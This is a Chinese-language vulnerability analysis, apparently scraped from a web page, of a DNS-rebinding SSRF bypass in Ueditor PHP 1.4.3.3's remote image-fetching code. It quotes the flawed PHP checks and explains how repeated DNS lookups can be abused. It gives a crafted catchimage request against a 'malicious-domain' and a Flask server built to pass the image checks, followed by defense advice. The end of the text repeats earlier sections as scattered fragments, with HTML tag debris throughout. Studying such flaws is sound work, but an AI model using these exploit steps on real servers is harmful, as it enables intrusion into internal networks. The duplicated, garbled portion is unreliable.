Ueditor PHP Ver 1.4.3.3 - DNS Rebinding Bypass SSRF 漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Ueditor PHP版本1.4.3.3存在一个通过DNS重绑定技术绕过SSRF防护的漏洞。该漏洞存在于图片抓取功能中，攻击者可以利用DNS重绑定技术绕过内网IP检查，实现对内网系统的SSRF攻击。<\/p>

漏洞分析<\/h2>

漏洞位置<\/h3>
漏洞主要存在于`\/php\/Uploader.class.php<\/code>文件的saveRemote()<\/code>方法中，具体是图片抓取功能的实现逻辑。<\/p>`

关键代码流程<\/h3>


URL验证阶段<\/strong>：<\/p>
\/\/ http开头验证
<\/span><\/span><\/span><\/span>if<\/span> (strpos<\/span>($imgUrl, "http"<\/span>) !==<\/span> 0<\/span>) {
<\/span><\/span>    $this-><\/span>stateInfo<\/span> =<\/span> $this-><\/span>getStateInfo<\/span>("ERROR_HTTP_LINK"<\/span>);
<\/span><\/span>    return<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

主机名提取与验证<\/strong>：<\/p>
preg_match<\/span>('\/(^https*:\\/\\/[^:\\/]+)\/'<\/span>, $imgUrl, $matches);
<\/span><\/span>$host_with_protocol =<\/span> count<\/span>($matches) ><\/span> 1<\/span> ?<\/span> $matches[1<\/span>] :<\/span> ''<\/span>;
<\/span><\/span>
<\/span><\/span>if<\/span> (!<\/span>filter_var<\/span>($host_with_protocol, FILTER_VALIDATE_URL<\/span>)) {
<\/span><\/span>    $this-><\/span>stateInfo<\/span> =<\/span> $this-><\/span>getStateInfo<\/span>("INVALID_URL"<\/span>);
<\/span><\/span>    return<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

IP检查阶段<\/strong>：<\/p>
preg_match<\/span>('\/^https*:\\/\\/(.+)\/'<\/span>, $host_with_protocol, $matches);
<\/span><\/span>$host_without_protocol =<\/span> count<\/span>($matches) ><\/span> 1<\/span> ?<\/span> $matches[1<\/span>] :<\/span> ''<\/span>;
<\/span><\/span>
<\/span><\/span>$ip =<\/span> gethostbyname<\/span>($host_without_protocol);
<\/span><\/span>if<\/span>(!<\/span>filter_var<\/span>($ip, FILTER_VALIDATE_IP<\/span>, FILTER_FLAG_NO_PRIV_RANGE<\/span>)) {
<\/span><\/span>    $this-><\/span>stateInfo<\/span> =<\/span> $this-><\/span>getStateInfo<\/span>("INVALID_IP"<\/span>);
<\/span><\/span>    return<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

HTTP请求与内容验证<\/strong>：<\/p>
$heads =<\/span> get_headers<\/span>($imgUrl, 1<\/span>);
<\/span><\/span>if<\/span> (!<\/span>(stristr<\/span>($heads[0<\/span>], "200"<\/span>) &&<\/span> stristr<\/span>($heads[0<\/span>], "OK"<\/span>))) {
<\/span><\/span>    $this-><\/span>stateInfo<\/span> =<\/span> $this-><\/span>getStateInfo<\/span>("ERROR_DEAD_LINK"<\/span>);
<\/span><\/span>    return<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$fileType =<\/span> strtolower<\/span>(strrchr<\/span>($imgUrl, '.'<\/span>));
<\/span><\/span>if<\/span> (!<\/span>in_array<\/span>($fileType, $this-><\/span>config<\/span>['allowFiles'<\/span>]) ||<\/span> !<\/span>isset<\/span>($heads['Content-Type'<\/span>]) ||<\/span> !<\/span>stristr<\/span>($heads['Content-Type'<\/span>], "image"<\/span>)) {
<\/span><\/span>    $this-><\/span>stateInfo<\/span> =<\/span> $this-><\/span>getStateInfo<\/span>("ERROR_HTTP_CONTENTTYPE"<\/span>);
<\/span><\/span>    return<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

最终内容获取<\/strong>：<\/p>
ob_start<\/span>();
<\/span><\/span>$context =<\/span> stream_context_create<\/span>(
<\/span><\/span>    array<\/span>('http'<\/span> =><\/span> array<\/span>(
<\/span><\/span>        'follow_location'<\/span> =><\/span> false<\/span> \/\/ don't follow redirects
<\/span><\/span><\/span><\/span>    ))
<\/span><\/span>);
<\/span><\/span>readfile<\/span>($imgUrl, false<\/span>, $context);
<\/span><\/span>$img =<\/span> ob_get_contents<\/span>();
<\/span><\/span>ob_end_clean<\/span>();
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
漏洞原理<\/h3>
漏洞利用的关键在于DNS重绑定技术。系统在不同阶段对同一域名进行DNS解析时可能得到不同的IP地址：<\/p>

第一次DNS解析发生在gethostbyname()<\/code>调用时 - 返回外网IP（通过检查）<\/li>
第二次DNS解析发生在get_headers()<\/code>调用时 - 可以返回内网IP（实际请求）<\/li>
第三次DNS解析发生在readfile()<\/code>调用时 - 可以返回内网IP（获取内容）<\/li>
<\/ol>
由于DNS解析结果在不同阶段可能不同，攻击者可以绕过内网IP检查，实现对内网系统的SSRF攻击。<\/p>
漏洞利用<\/h2>
利用条件<\/h3>

可控的DNS服务器，能够实现DNS重绑定<\/li>
目标系统允许对外发起HTTP请求<\/li>
<\/ol>
利用步骤<\/h3>


设置DNS重绑定<\/strong>：<\/p>

配置DNS服务器，使得短时间内对同一域名的查询返回不同的IP地址<\/li>
<\/ul>
<\/li>

构造恶意请求<\/strong>：<\/p>
http:\/\/target\/ueditor\/php\/controller.php?action=catchimage&source[]=http:\/\/malicious-domain\/aaa=1%26logo.png
<\/code><\/pre>
<\/li>

利用流程<\/strong>：<\/p>

第一次DNS解析（gethostbyname）：返回外网IP<\/li>
第二次DNS解析（get_headers）：返回攻击者控制的外网服务器IP<\/li>
第三次DNS解析（readfile）：返回内网目标IP<\/li>
<\/ul>
<\/li>

绕过限制的服务器实现<\/strong>（Python Flask示例）：<\/p>
from<\/span> flask import<\/span> Flask, Response
<\/span><\/span>from<\/span> werkzeug.routing import<\/span> BaseConverter
<\/span><\/span>
<\/span><\/span>class<\/span> Regex_url<\/span>(BaseConverter):
<\/span><\/span>    def<\/span> __init__(self,url_map,*<\/span>args):
<\/span><\/span>        super(Regex_url,self).<\/span>__init__(url_map)
<\/span><\/span>        self.<\/span>regex =<\/span> args[0<\/span>]
<\/span><\/span>
<\/span><\/span>app =<\/span> Flask(__name__)
<\/span><\/span>app.<\/span>url_map.<\/span>converters['re'<\/span>] =<\/span> Regex_url
<\/span><\/span>
<\/span><\/span>@app<\/span>.<\/span>route('\/<re(".*?"):tmp>'<\/span>)
<\/span><\/span>def<\/span> test<\/span>(tmp):
<\/span><\/span>    image =<\/span> 'Test'<\/span>
<\/span><\/span>    resp =<\/span> Response(image, mimetype=<\/span>"image\/jpeg"<\/span>)
<\/span><\/span>    return<\/span> resp
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    app.<\/span>run(host=<\/span>'0.0.0.0'<\/span>,port=<\/span>80<\/span>)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
获取回显内容<\/h3>
由于系统会将获取的内容保存为图片，攻击者可以通过查看返回的图片内容获取SSRF请求的响应。<\/p>
防御建议<\/h2>

禁用不必要的远程资源获取功能<\/strong><\/li>
加强DNS解析一致性检查<\/strong>：

在第一次解析后缓存IP地址，后续请求使用缓存的IP<\/li>
<\/ul>
<\/li>
增强URL验证<\/strong>：

使用白名单限制允许的域名<\/li>
禁止访问私有IP地址段<\/li>
<\/ul>
<\/li>
设置请求超时<\/strong>：

限制DNS解析和HTTP请求的超时时间<\/li>
<\/ul>
<\/li>
更新到最新版本<\/strong>：

检查是否有官方修复版本<\/li>
<\/ul>
<\/li>
<\/ol>
注意事项<\/h2>

DNS重绑定的成功率受DNS缓存影响，可能不稳定<\/li>
需要精心设计攻击流程以确保在不同阶段获得预期的IP地址<\/li>
实际利用时需要考虑目标系统的网络环境和配置<\/li>
<\/ol>
总结<\/h2>
Ueditor PHP 1.4.3.3版本的SSRF漏洞通过DNS重绑定技术绕过了内网IP检查，允许攻击者访问内网资源。该漏洞的关键在于系统在不同阶段对同一域名的DNS解析结果不一致，且没有进行一致性验证。防御此类漏洞需要从多个层面进行防护，包括DNS解析一致性检查、URL验证强化和功能权限控制等。<\/p>

Ueditor PHP Ver 1.4.3.3 - DNS Rebinding Bypass SSRF 漏洞分析与利用<\/h1>

漏洞概述<\/h2> Ueditor PHP版本1.4.3.3存在一个通过DNS重绑定技术绕过SSRF防护的漏洞。该漏洞存在于图片抓取功能中，攻击者可以利用DNS重绑定技术绕过内网IP检查，实现对内网系统的SSRF攻击。<\/p>

漏洞分析<\/h2>

漏洞位置<\/h3> 漏洞主要存在于\/php\/Uploader.class.php<\/code>文件的saveRemote()<\/code>方法中，具体是图片抓取功能的实现逻辑。<\/p>

漏洞利用<\/h2>

获取回显内容<\/h3> 由于系统会将获取的内容保存为图片，攻击者可以通过查看返回的图片内容获取SSRF请求的响应。<\/p>

漏洞概述<\/h2>
Ueditor PHP版本1.4.3.3存在一个通过DNS重绑定技术绕过SSRF防护的漏洞。该漏洞存在于图片抓取功能中，攻击者可以利用DNS重绑定技术绕过内网IP检查，实现对内网系统的SSRF攻击。<\/p>

漏洞位置<\/h3>
漏洞主要存在于`\/php\/Uploader.class.php<\/code>文件的saveRemote()<\/code>方法中，具体是图片抓取功能的实现逻辑。<\/p>`

获取回显内容<\/h3>
由于系统会将获取的内容保存为图片，攻击者可以通过查看返回的图片内容获取SSRF请求的响应。<\/p>